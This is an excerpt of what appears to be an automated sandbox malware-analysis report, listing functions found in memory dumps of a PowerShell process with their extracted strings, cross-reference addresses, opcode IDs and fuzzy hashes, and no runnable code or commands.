$jq, xrefs: 09021444
$jq, xrefs: 09021460
(f=l, xrefs: 0902176B
$jq, xrefs: 090210C6
(f=l, xrefs: 09021761
tPjq, xrefs: 090214C4
tPjq, xrefs: 090214D0
4'jq, xrefs: 09021161

Memory Dump Source

Source File: 00000002.00000002.2422828811.0000000009020000.00000040.00000800.00020000.00000000.sdmp, Offset: 09020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9020000_powershell.jbxd

Similarity

API ID:
String ID: (f=l$(f=l$4'jq$4'jq$4'jq$4'jq$tPjq$tPjq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq
API String ID: 0-2361207814
Opcode ID: 143485d1df2d3b8da2acca9aa84400f4622843de7a9753a638267897d00d7fcd
Instruction ID: a5fec21e50b2797fcff6401801b9bb6e64de93b59dba415dacfd467fcd329022
Opcode Fuzzy Hash: 143485d1df2d3b8da2acca9aa84400f4622843de7a9753a638267897d00d7fcd
Instruction Fuzzy Hash: 8732D535B08224DFCB94CF68C451AAEBBF6EF85310F1488AAE9059B351CB35DD45CBA1

Function 072B848F Relevance: 20.6, Strings: 16, Instructions: 646COMMON

Download Yara Rule

Strings

(f=l, xrefs: 072B78E7
-.k, xrefs: 072B8225
(f=l, xrefs: 072B7AB2
(f=l, xrefs: 072B7C4A
4'jq, xrefs: 072B7EAA
(f=l, xrefs: 072B7B0A
x..k, xrefs: 072B81D4
(f=l, xrefs: 072B8033
(f=l, xrefs: 072B7F59
(f=l, xrefs: 072B795E
(f=l, xrefs: 072B7BA4
(f=l, xrefs: 072B7812
(f=l, xrefs: 072B7CA6
(f=l, xrefs: 072B8088
(f=l, xrefs: 072B787C
tL/k, xrefs: 072B7932

Memory Dump Source

Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72b0000_powershell.jbxd

Similarity

API ID:
String ID: (f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$4'jq$tL/k$x..k$-.k
API String ID: 0-4069803157
Opcode ID: 17a2ce1695edcda939e58808f436af7cb3d4bce78e938de4652a3086a7a95d4e
Instruction ID: 18292b87d1c6e5ab792e903f0e85d76603cb72ab3c052a871d100ace27c99ba8
Opcode Fuzzy Hash: 17a2ce1695edcda939e58808f436af7cb3d4bce78e938de4652a3086a7a95d4e
Instruction Fuzzy Hash: 125292B4A10215CFD720DB64C991BAEBBB2EF84304F10C999D91A6B351CB75BD81CFA1

Function 072BD439 Relevance: 20.6, Strings: 16, Instructions: 625COMMON

Download Yara Rule

Strings

(f=l, xrefs: 072BC830
(f=l, xrefs: 072BCB9D
(f=l, xrefs: 072BCF27
(f=l, xrefs: 072BD018
(f=l, xrefs: 072BCB01
(f=l, xrefs: 072BCFBD
4'jq, xrefs: 072BCE70
tL/k, xrefs: 072BC944
(f=l, xrefs: 072BC89E
x..k, xrefs: 072BD18C
(f=l, xrefs: 072BCC96
(f=l, xrefs: 072BC966
-.k, xrefs: 072BD1DD
(f=l, xrefs: 072BC8FD
(f=l, xrefs: 072BCAB0
(f=l, xrefs: 072BCC38

Memory Dump Source

Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72b0000_powershell.jbxd

Similarity

API ID:
String ID: (f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$(f=l$4'jq$tL/k$x..k$-.k
API String ID: 0-4069803157
Opcode ID: 7c9941236273eec7d85b59d5bf0798beed3a7c58bedd8dd6e08a16ef12ec960c
Instruction ID: e6cd47a6bd3ed9e0ce36bc33865acdd51770d08b0b8c2017ce2d818d748054d6
Opcode Fuzzy Hash: 7c9941236273eec7d85b59d5bf0798beed3a7c58bedd8dd6e08a16ef12ec960c
Instruction Fuzzy Hash: 7442A574A102158FD764DB68CD91BEEB7B2AF89304F1188A8D91A6B341CB35FD82CF51

Function 072B6148 Relevance: 15.6, Strings: 12, Instructions: 646COMMON

Download Yara Rule

Strings

x..k, xrefs: 072B68B4
-.k, xrefs: 072B68F9
4'jq, xrefs: 072B62AD
(f=l, xrefs: 072B6601
tPjq, xrefs: 072B6438
4'jq, xrefs: 072B6868
4'jq, xrefs: 072B62A1
4'jq, xrefs: 072B6874
4'jq, xrefs: 072B67E9
(f=l, xrefs: 072B660B
tPjq, xrefs: 072B642C
4'jq, xrefs: 072B67F5

Memory Dump Source

Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72b0000_powershell.jbxd

Similarity

API ID:
String ID: (f=l$(f=l$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$tPjq$tPjq$x..k$-.k
API String ID: 0-1696082827
Opcode ID: 7289c45714a3cdaab31db0455b266b29f05af666a4c2afbe9cdfb2f025b5a2a3
Instruction ID: 2925601ae4776933d21d949f826e4dc64a8be08f59b171fb19562016471c0380
Opcode Fuzzy Hash: 7289c45714a3cdaab31db0455b266b29f05af666a4c2afbe9cdfb2f025b5a2a3
Instruction Fuzzy Hash: 4132F9B1B202069FCB249F68C951BAEBBB2EF84340F14C469D9059F396CB75DC45CBA1

Function 072BD4B7 Relevance: 11.7, Strings: 9, Instructions: 436COMMON

Download Yara Rule

Strings

(f=l, xrefs: 072BDBE6
(f=l, xrefs: 072BDD58
4:l, xrefs: 072BD794
tL/k, xrefs: 072BD8BA
4'jq, xrefs: 072BD941
(f=l, xrefs: 072BD746
x..k, xrefs: 072BDE75
(f=l, xrefs: 072BDA4C
(f=l, xrefs: 072BD854

Memory Dump Source

Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72b0000_powershell.jbxd

Similarity

API ID:
String ID: (f=l$(f=l$(f=l$(f=l$(f=l$4'jq$4:l$tL/k$x..k
API String ID: 0-2015015718
Opcode ID: 2f44e48e28c547f980aa6b4135e446f9a4ad5816fafa581ce2c02f2d533c4ddb
Instruction ID: 345b0d1a351b23c82fa7c02484d215d1a67f312a5d7c3217ca77e9a846a09d79
Opcode Fuzzy Hash: 2f44e48e28c547f980aa6b4135e446f9a4ad5816fafa581ce2c02f2d533c4ddb
Instruction Fuzzy Hash: 13122BB4A20216CFDB34CB24C991BE9B7B2EB45340F1188E9D50AAB391DB75ED81CF51

Function 072BD6CC Relevance: 11.7, Strings: 9, Instructions: 435COMMON

Download Yara Rule

Strings

(f=l, xrefs: 072BDBE6
(f=l, xrefs: 072BDD58
4:l, xrefs: 072BD794
tL/k, xrefs: 072BD8BA
4'jq, xrefs: 072BD941
(f=l, xrefs: 072BD746
x..k, xrefs: 072BDE75
(f=l, xrefs: 072BDA4C
(f=l, xrefs: 072BD854

Memory Dump Source

Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72b0000_powershell.jbxd

Similarity

API ID:
String ID: (f=l$(f=l$(f=l$(f=l$(f=l$4'jq$4:l$tL/k$x..k
API String ID: 0-2015015718
Opcode ID: c7dbf36047e24942c654020a63e8b3824404fc35f5f066ddd4e3862dc879eac7
Instruction ID: 55c6171d1231f7dba4974d72a0d1eb97b533eb5b0ed68e37cea86265322d0d8b
Opcode Fuzzy Hash: c7dbf36047e24942c654020a63e8b3824404fc35f5f066ddd4e3862dc879eac7
Instruction Fuzzy Hash: 71124DB4A20216CFDB34CB24C991BE9B7B2EB45340F1188E9D50AAB381DB75ED81CF51

Function 09021C7E Relevance: 5.2, Strings: 4, Instructions: 211COMMON

Download Yara Rule

Strings

84;l, xrefs: 09021D19
84;l, xrefs: 09021D25
tPjq, xrefs: 09021D80
tPjq, xrefs: 09021D74

Memory Dump Source

Source File: 00000002.00000002.2422828811.0000000009020000.00000040.00000800.00020000.00000000.sdmp, Offset: 09020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9020000_powershell.jbxd

Similarity

API ID:
String ID: 84;l$84;l$tPjq$tPjq
API String ID: 0-3144484473
Opcode ID: d66ef877bed69763db5d65d48e046da40c21678902b6133b9b674d011ed2c340
Instruction ID: 8cba686d14b6308d98819c653efb98a31d247905d33d2ba5803de056e3794c27
Opcode Fuzzy Hash: d66ef877bed69763db5d65d48e046da40c21678902b6133b9b674d011ed2c340
Instruction Fuzzy Hash: A271E635608224DFCB908F68C8506AEBBE6FF84354F64886AEC169F391DB31DD45CB91

Function 090231B2 Relevance: 5.1, Strings: 4, Instructions: 74COMMON

Download Yara Rule

Strings

4'jq, xrefs: 09023213
$jq, xrefs: 090231DF
4'jq, xrefs: 09023207
$jq, xrefs: 090231EB

Memory Dump Source

Source File: 00000002.00000002.2422828811.0000000009020000.00000040.00000800.00020000.00000000.sdmp, Offset: 09020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9020000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq$$jq$$jq
API String ID: 0-1496060811
Opcode ID: 711b5f21f135dde4f77ce08f5d8ed0cfec8d9abb26c0be8e4f4b02a42006dd46
Instruction ID: 047004f0a82c38631bded02ca055c70dfa330b18c0137c9038a5b738c62c2b1c
Opcode Fuzzy Hash: 711b5f21f135dde4f77ce08f5d8ed0cfec8d9abb26c0be8e4f4b02a42006dd46
Instruction Fuzzy Hash: 17218B32B443298FCF149A69A8111FAF7E5FF86650F10887FD886C7586DA39C80AC752

Function 072B3E00 Relevance: 3.9, Strings: 3, Instructions: 124COMMON

Download Yara Rule

Strings

$jq, xrefs: 072B3E67
$jq, xrefs: 072B3E5B
$jq, xrefs: 072B3E23

Memory Dump Source

Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72b0000_powershell.jbxd

Similarity

API ID:
String ID: $jq$$jq$$jq
API String ID: 0-3696375380
Opcode ID: 64d42331b68b7bc45bb1ae91435a5db99f991d8d32f54a967be4b4a478766323
Instruction ID: 340b2d2f530719661f48f7d4401f5016c9462b57bfb99b5e8d71c446920ebcda
Opcode Fuzzy Hash: 64d42331b68b7bc45bb1ae91435a5db99f991d8d32f54a967be4b4a478766323
Instruction Fuzzy Hash: 2D4118B2B202569BCB34DAA9C8402EFF7A5EF84750B14852BD905E7246DB32ED05C7E1

Function 072B4548 Relevance: 2.9, Strings: 2, Instructions: 434COMMON

Download Yara Rule

Strings

4'jq, xrefs: 072B4943
4'jq, xrefs: 072B494F

Memory Dump Source

Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72b0000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq
API String ID: 0-1204115232
Opcode ID: 5f23673d6749d78bff906db534f532c7ffab56a3226727504a2ab9aac9cb6558
Instruction ID: b7df74c8514021583e44a663aadef25027f83c8211fa6710fa580ae92b204548
Opcode Fuzzy Hash: 5f23673d6749d78bff906db534f532c7ffab56a3226727504a2ab9aac9cb6558
Instruction Fuzzy Hash: CC02BF74B112468FDB54DB58C591EAABBF2EF88704F14C069E9059F392CB72EC42CB91

Function 072B3C48 Relevance: 2.6, Strings: 2, Instructions: 125COMMON

Download Yara Rule

Strings

4'jq, xrefs: 072B3CE9
4'jq, xrefs: 072B3CDD

Memory Dump Source

Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72b0000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq
API String ID: 0-1204115232
Opcode ID: b77d29d4e631a1ba8d2d71409062e664e5df257c81d0636a01e2a80b53e913dc
Instruction ID: 7d724603d0cf2f73a38747803ee9ac213d235a2927e355fbe791e8509acf79d2
Opcode Fuzzy Hash: b77d29d4e631a1ba8d2d71409062e664e5df257c81d0636a01e2a80b53e913dc
Instruction Fuzzy Hash: F2414AB57242079FCB24DB6C84112EABBA6EFC2350F1584AEC506CB252DB31D945CBA2

Function 072B3DEB Relevance: 2.6, Strings: 2, Instructions: 70COMMON

Download Yara Rule

Strings

$jq, xrefs: 072B3E5B
$jq, xrefs: 072B3E23

Memory Dump Source

Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72b0000_powershell.jbxd

Similarity

API ID:
String ID: $jq$$jq
API String ID: 0-3720491408
Opcode ID: 3c259baac076fe5a0f57c4b3fb885a5ed077cc0fc0a3adfb9b9d05581d4ca0ac
Instruction ID: a13ea113b00b60dbb7f7c9658fa8db48796ade554c7de5d4926dc95e236cfa22
Opcode Fuzzy Hash: 3c259baac076fe5a0f57c4b3fb885a5ed077cc0fc0a3adfb9b9d05581d4ca0ac
Instruction Fuzzy Hash: 0F21D8F6D202569BCF30DE99C9801EAB7B5EF49390B198167DC09E7246E730AD40CBE1

Function 072B6B15 Relevance: 1.7, Strings: 1, Instructions: 440COMMON

Download Yara Rule

Strings

4'jq, xrefs: 072B6FEA

Memory Dump Source

Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72b0000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq
API String ID: 0-3676250632
Opcode ID: 3d9ef6b4fe5a8bc2d40e6f97d717d3d7c69ecf8db7fb88966bbf3086d3d089f8
Instruction ID: 48f4a986617180570f2d43a22757569cf5d980e6cb597fb36281512b21a842e2
Opcode Fuzzy Hash: 3d9ef6b4fe5a8bc2d40e6f97d717d3d7c69ecf8db7fb88966bbf3086d3d089f8
Instruction Fuzzy Hash: 82028E74B11205EFDB14CF98C981EA9BBB2EF84304F158059E906AF396C776EC46CB91

Function 090114A0 Relevance: 1.6, Strings: 1, Instructions: 398COMMON

Download Yara Rule

Strings

W, xrefs: 090115FC

Memory Dump Source

Source File: 00000002.00000002.2422800560.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9010000_powershell.jbxd

Similarity

API ID:
String ID: W
API String ID: 0-655174618
Opcode ID: a6147cd5f2c0b0b35973d6ba70fa0b606d122b2dce9df54a05a985f3dadce265
Instruction ID: 2fdadd3821edbb108bbed7bb3ea30b87383759ecce392a7372cffd9aef3aa6ce
Opcode Fuzzy Hash: a6147cd5f2c0b0b35973d6ba70fa0b606d122b2dce9df54a05a985f3dadce265
Instruction Fuzzy Hash: D1023B74A05209DFCB49CF98D584A9EBBF2FF88310F248559E915AB365C735EC81CB90

Function 072B452C Relevance: 1.6, Strings: 1, Instructions: 387COMMON

Download Yara Rule

Strings

4'jq, xrefs: 072B4943

Memory Dump Source

Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72b0000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq
API String ID: 0-3676250632
Opcode ID: f0280aa0438d6af69b455a741823a417b1ec75fc709f77ff6571468e29183096
Instruction ID: d0a29fa39f2d8454238c2f9437cbdf56333522346700fcc2dd8dafa7f3c1cdc0
Opcode Fuzzy Hash: f0280aa0438d6af69b455a741823a417b1ec75fc709f77ff6571468e29183096
Instruction Fuzzy Hash: 94F19BB4B11246DFDB64DF58C581EAABBB2EF88704F15C059E9059B392C772EC42CB90

Function 0902157D Relevance: 1.5, Strings: 1, Instructions: 210COMMON

Download Yara Rule

Strings

(f=l, xrefs: 09021761

Memory Dump Source

Source File: 00000002.00000002.2422828811.0000000009020000.00000040.00000800.00020000.00000000.sdmp, Offset: 09020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9020000_powershell.jbxd

Similarity

API ID:
String ID: (f=l
API String ID: 0-645171858
Opcode ID: 7ff2e4ccca3e6cc4a47a7e4bcf44d80c132ba85070f04dd25ca07579d149306e
Instruction ID: 024a7391628c91822140e947c9c2e1c34951ef928c411e34e1a7e2c6e15f6dc2
Opcode Fuzzy Hash: 7ff2e4ccca3e6cc4a47a7e4bcf44d80c132ba85070f04dd25ca07579d149306e
Instruction Fuzzy Hash: 99816A35A04214DFCB94CF54C585AAEBBF2EF88314F1985A9E805AB355C736EC82CF60

Function 072B71BA Relevance: 1.4, Strings: 1, Instructions: 161COMMON

Download Yara Rule

Strings

(f=l, xrefs: 072B7302

Memory Dump Source

Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72b0000_powershell.jbxd

Similarity

API ID:
String ID: (f=l
API String ID: 0-645171858
Opcode ID: 1984de87763cfc18171f5f2c784d817796bd4c4e1fd8ffee19cf9536e17bacea
Instruction ID: 5b6cd42d9b7348c4a736306641175cf9da1d435976f5dc6f91423f4b2e7f58a7
Opcode Fuzzy Hash: 1984de87763cfc18171f5f2c784d817796bd4c4e1fd8ffee19cf9536e17bacea
Instruction Fuzzy Hash: 9551D574721202EFDB24CF64C541FAABBB2EF85345F14806AE9016B392C776DD45CB61

Function 072B6980 Relevance: 1.4, Strings: 1, Instructions: 102COMMON

Download Yara Rule

Strings

x..k, xrefs: 072B6A32

Memory Dump Source

Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72b0000_powershell.jbxd

Similarity

API ID:
String ID: x..k
API String ID: 0-1820036473
Opcode ID: 0a1c18296a34a8134f32181a81e8e4b7611eb31bcf181dc2a1a8228e722217ca
Instruction ID: ef76f984e1145060271f82c36a709656519e535ba42057fddd3ab104ee1ce7b6
Opcode Fuzzy Hash: 0a1c18296a34a8134f32181a81e8e4b7611eb31bcf181dc2a1a8228e722217ca
Instruction Fuzzy Hash: 1C31D874B502049BD7149B68C992BAFBBA3DF84344F10C414E9016F396CF7AAC46CBE1

Function 09021230 Relevance: 1.3, Strings: 1, Instructions: 87COMMON

Download Yara Rule

Strings

4'jq, xrefs: 09021342

Memory Dump Source

Source File: 00000002.00000002.2422828811.0000000009020000.00000040.00000800.00020000.00000000.sdmp, Offset: 09020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9020000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq
API String ID: 0-3676250632
Opcode ID: 78b9feaa677a7d9caeb332edf0c2f3bf2a4307443a9cc8e296e1ac2ba6fe7af4
Instruction ID: 159e123cfc35d8c1a2349df35a3aa582f056c038ebf1f51406df13660b00d126
Opcode Fuzzy Hash: 78b9feaa677a7d9caeb332edf0c2f3bf2a4307443a9cc8e296e1ac2ba6fe7af4
Instruction Fuzzy Hash: 32213831B08324DBDBE04E25844277EB7D39F84740F654965F911EB284DB3AE942C7E1

Function 072B4BD6 Relevance: 1.3, Strings: 1, Instructions: 39COMMON

Download Yara Rule

Strings

j, xrefs: 072B4BD6

Memory Dump Source

Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72b0000_powershell.jbxd

Similarity

API ID:
String ID: j
API String ID: 0-2137352139
Opcode ID: 05dbc4d3f273c2aa10313fa6b53f7b033495d9b000bdea223b5aaa118e492491
Instruction ID: 01fc124ab7c9e94b74e53054058fde6079cd1182e2a7f21585650c337477144e
Opcode Fuzzy Hash: 05dbc4d3f273c2aa10313fa6b53f7b033495d9b000bdea223b5aaa118e492491
Instruction Fuzzy Hash: EAF04CF5668286D7E730BEA8CCC0ED5B711EF91364F0482AEE6154A197C772C012C753

Function 09011E68 Relevance: .4, Instructions: 429COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2422800560.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9010000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06f3bc38a8fea96085fc6c1b3704ccf8bd1ba020780842c36e326ac2946d7816
Instruction ID: 40fefc32005ea01975af79caa804713a9a3e6de07a3cc9a4c4052a77f74d9234
Opcode Fuzzy Hash: 06f3bc38a8fea96085fc6c1b3704ccf8bd1ba020780842c36e326ac2946d7816
Instruction Fuzzy Hash: F6021B74A002099FCB55CF9CD984AAEBBF2FF88310F258559E915AB365C731ED81CB90

Function 09012428 Relevance: .4, Instructions: 424COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2422800560.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9010000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7314e38de0b4077e8a36e44fac9f4102628bc3c0fb615678370666c9cffb053
Instruction ID: 58b524723497bc7730010c6fb89e3c969e8b79723ccd8c00b410bbd2817e415a
Opcode Fuzzy Hash: b7314e38de0b4077e8a36e44fac9f4102628bc3c0fb615678370666c9cffb053
Instruction Fuzzy Hash: 56020975A012099FCB05CF9CD994AAEBBF2FF88310F248559E815AB365C735ED81CB90

Function 09010B80 Relevance: .4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2422800560.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9010000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df5a2d65171ddbc38bb023a4a214019a0e4e3ad95824f9537700ef6b59cb9da8
Instruction ID: 3de7eb16e8224d1eaf23d0f997951784db104cd9e9c526056873ebd6d5d91321
Opcode Fuzzy Hash: df5a2d65171ddbc38bb023a4a214019a0e4e3ad95824f9537700ef6b59cb9da8
Instruction Fuzzy Hash: 66F14874A01249DFCB05CFA8D584A9EBBF2FF89310F248559E845AB361C735ED82CB90

Function 090107C8 Relevance: .2, Instructions: 221COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2422800560.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9010000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1682b41299760ca305e1c014d04bcac8b25ae17cda2520ca5d6bf7b8832b9c42
Instruction ID: 2b66264f390a45f1c7f47003652784bdc36b00aebac631a433c2c2a3b92c7a69
Opcode Fuzzy Hash: 1682b41299760ca305e1c014d04bcac8b25ae17cda2520ca5d6bf7b8832b9c42
Instruction Fuzzy Hash: 0081AE31B002098FCB05DFA9D950AAEBBFAFF88300F148569D4459B365DB35ED46CBA1

Function 090129D0 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2422800560.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9010000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d0fb175d4f41b5cdb1f0d26175c72c36bf10bd7836275205607253a74087434
Instruction ID: e14f79f0cc53e552527b70761892dcbd54a040c79bf9f6ee548c4332146ed259
Opcode Fuzzy Hash: 6d0fb175d4f41b5cdb1f0d26175c72c36bf10bd7836275205607253a74087434
Instruction Fuzzy Hash: 5D513F70A006098FCB15CF9CC9959AEFBB2FF88314B648658E925A73A4D331EC91CB50

Function 090129E0 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2422800560.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9010000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fbb7bdc8f63246c4aa0ce116dfc286ff991b080e005affb68c6b157338e17c3
Instruction ID: f446fcebbc4f1fb8f5cf2a0624f5f27ca9d42095736c2e9b2246d4e2da1d0abf
Opcode Fuzzy Hash: 1fbb7bdc8f63246c4aa0ce116dfc286ff991b080e005affb68c6b157338e17c3
Instruction Fuzzy Hash: 1D514170A006099FCB15CF9CC9949AEFBB2FF48310B648559E925E73A4C735EC91CB90

Function 09010E87 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2422800560.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9010000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c26b88d3c6c0fc72ddad735c7470b413e38cd6f866767900b82653936ee837ee
Instruction ID: 2585d50d7884db7e640df7dbcf079bd62f1fa5e605b1918fb98fd2ed1b417827
Opcode Fuzzy Hash: c26b88d3c6c0fc72ddad735c7470b413e38cd6f866767900b82653936ee837ee
Instruction Fuzzy Hash: 7F51E634A00209EFDB05CF98D584A9DBBF6FF88314F248559E805AB365CB35ED82CB90

Function 09012417 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2422800560.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9010000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac56a4dbcea03c5880d057e8398ace3a2dc2255e93f256d6c3e706dba537309a
Instruction ID: e8f01a094d076171401984d7a967027c5caca1bdf6a9a0f11de08594f80cfd0d
Opcode Fuzzy Hash: ac56a4dbcea03c5880d057e8398ace3a2dc2255e93f256d6c3e706dba537309a
Instruction Fuzzy Hash: 5C411A74A011059FCB15CF9CC994AAEBBF1FF49314B648658E925EB3A5C335EC81CB90

Function 09011490 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2422800560.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9010000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe6ad891334f94f8cdfb3ca540a11091ac2fcbb6b04cc482d3876eb0a60a2719
Instruction ID: 48dfba564ef92632b99287b7cd322c9b5037c197cfbdb94c04779c75b3808239
Opcode Fuzzy Hash: fe6ad891334f94f8cdfb3ca540a11091ac2fcbb6b04cc482d3876eb0a60a2719
Instruction Fuzzy Hash: EF410974A05115DFCB58CF9CC9849AEBBB2FF48310B248659E915E7364D331EC41CBA0

Function 09011E57 Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2422800560.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9010000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d76e31d288367a9e613a349d67b7cbd65d38b8bb476d30404bac63c4f4fbde3
Instruction ID: c1b631ff120f5da622fcad6b3530cd285eae191c3971edafb92e7813ac5a5e3a
Opcode Fuzzy Hash: 2d76e31d288367a9e613a349d67b7cbd65d38b8bb476d30404bac63c4f4fbde3
Instruction Fuzzy Hash: 09413970A041099FCB49CF9CC9809AEBBF2FF48324B248659E915EB3A4C735EC41CB94

Function 090129B1 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2422800560.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9010000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efe955ce69ab7495e179f9d0dd73aa47635bc10d4386348ed904fe22082f9c1b
Instruction ID: 19e2fb251f5cc9c3489b08d442848daf748902f929ccff0d8635d3ffe2a7d418
Opcode Fuzzy Hash: efe955ce69ab7495e179f9d0dd73aa47635bc10d4386348ed904fe22082f9c1b
Instruction Fuzzy Hash: 72416330A016459FCB15CF5CC894ABEFBB2FF84314F648A58D525AB2A5D735EC92CB80

Function 072B8DDC Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd0b75527b0fff590d91b04c2ce749c0c2db6591519097587799714b5a43bfa4
Instruction ID: 5f078750c9b4bb011b3f2563092af16ea263e834b6fdd0743bf058e820b989e5
